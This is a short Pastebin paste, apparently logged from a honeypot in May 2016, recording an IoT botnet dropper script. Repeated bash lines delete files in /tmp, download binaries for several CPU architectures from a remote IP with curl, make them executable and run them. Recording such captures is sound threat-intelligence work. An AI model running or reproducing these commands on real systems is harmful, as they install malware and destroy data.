Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-05-16 07:45

May 16th, 2016
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.89 KB | None | 0 0
  1. ulimit -n 712
  2. cd /tmp || cd /var/run; rm -rf *; curl -o arm7 http://217.29.58.163/arm7; chmod 777 arm7; ./arm7
  3. cd /tmp || cd /var/run; rm -rf *; curl -o mipsel http://217.29.58.163/mipsel; chmod 777 mipsel; ./mipsel
  4. cd /tmp || cd /var/run; rm -rf *; curl -o mips http://217.29.58.163/mips; chmod 777 mips; ./mips
  5. cd /tmp || cd /var/run; rm -rf *; curl -o mips64 http://217.29.58.163/mips64; chmod 777 mips64; ./mips64
  6. cd /tmp || cd /var/run; rm -rf *; curl -o i686 http://217.29.58.163/i686; chmod 777 i686; ./i686
  7. cd /tmp || cd /var/run; rm -rf *; curl -o sparc http://217.29.58.163/sparc; chmod 777 sparc; ./sparc
  8. cd /tmp || cd /var/run; rm -rf *; curl -o sh4 http://217.29.58.163/sh4; chmod 777 sh4; ./sh4
  9. cd /tmp || cd /var/run; rm -rf *; curl -o x64 http://217.29.58.163/x64; chmod 777 x64; ./x64
  10. cd /tmp || cd /var/run; rm -rf *; curl -o ppc http://217.29.58.163/ppc; chmod 777 ppc; ./ppc
  11. rm -rf /tmp/*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement